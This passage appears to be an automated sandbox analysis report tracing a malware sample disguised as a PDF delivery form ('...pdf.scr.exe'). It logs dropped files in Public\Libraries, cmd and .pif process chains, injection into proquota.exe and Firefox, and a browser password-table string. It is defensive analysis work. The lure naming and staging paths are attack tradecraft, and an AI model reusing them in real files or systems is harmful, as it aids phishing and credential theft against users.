                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
                      Source: C:\Windows\SysWOW64\proquota.exeFile created: C:\Users\user\AppData\Local\Temp\0j0OId92LJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: proquota.exe, 00000010.00000003.2392117153.0000000000812000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeVirustotal: Detection: 33%
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile read: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe"
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Lwnkboxd.PIF "C:\Users\Public\Libraries\Lwnkboxd.PIF"
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Lwnkboxd.PIF "C:\Users\Public\Libraries\Lwnkboxd.PIF"
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection loaded: devobj.dllJump to behavior
